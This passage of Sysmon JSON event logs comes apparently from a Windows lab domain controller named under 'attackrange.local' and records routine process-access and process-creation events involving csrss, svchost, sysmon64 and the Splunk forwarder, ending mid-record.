{"EventTime":"2020-08-01 08:07:38","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8352,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:38.584\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2340\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-22CA-5F25-0000-0010638A1100}\r\nTargetProcessId: 4884\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:38.584","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2340","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-22CA-5F25-0000-0010638A1100}","TargetProcessId":"4884","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:07:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:38","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8353,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:38.584\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-22CA-5F25-0000-0010638A1100}\r\nTargetProcessId: 4884\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:38.584","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-22CA-5F25-0000-0010638A1100}","TargetProcessId":"4884","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":8354,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:40.741\r\nProcessGuid: {41C8662E-22CC-5F25-0000-0010888E1100}\r\nProcessId: 1428\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\r\nFileVersion: 10.0.10011.16384\r\nDescription: SplunkMonNoHandle Control Program\r\nProduct: Windows (R) Win 7 DDK driver\r\nCompany: Windows (R) Win 7 DDK provider\r\nOriginalFileName: SplunkMonNoHandle.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8\r\nParentProcessGuid: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nParentProcessId: 4576\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 08:07:40.741","ProcessGuid":"{41C8662E-22CC-5F25-0000-0010888E1100}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe","FileVersion":"10.0.10011.16384","Description":"SplunkMonNoHandle Control Program","Product":"Windows (R) Win 7 DDK driver","Company":"Windows (R) Win 7 DDK provider","OriginalFileName":"SplunkMonNoHandle.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8","ParentProcessGuid":"{41C8662E-1FF3-5F25-0000-00109F540500}","ParentProcessId":"4576","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 08:07:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8355,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:40.740\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nSourceProcessId: 4576\r\nSourceThreadId: 2580\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {41C8662E-22CC-5F25-0000-0010888E1100}\r\nTargetProcessId: 1428\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:40.740","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-00109F540500}","SourceProcessId":"4576","SourceThreadId":"2580","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{41C8662E-22CC-5F25-0000-0010888E1100}","TargetProcessId":"1428","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8356,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:40.740\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2336\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-22CC-5F25-0000-0010888E1100}\r\nTargetProcessId: 1428\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:40.740","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2336","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-22CC-5F25-0000-0010888E1100}","TargetProcessId":"1428","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:07:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8357,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:40.740\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:40.740","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8358,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:40.740\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:40.740","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8359,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:40.740\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:40.740","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:40","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8360,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:40.740\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 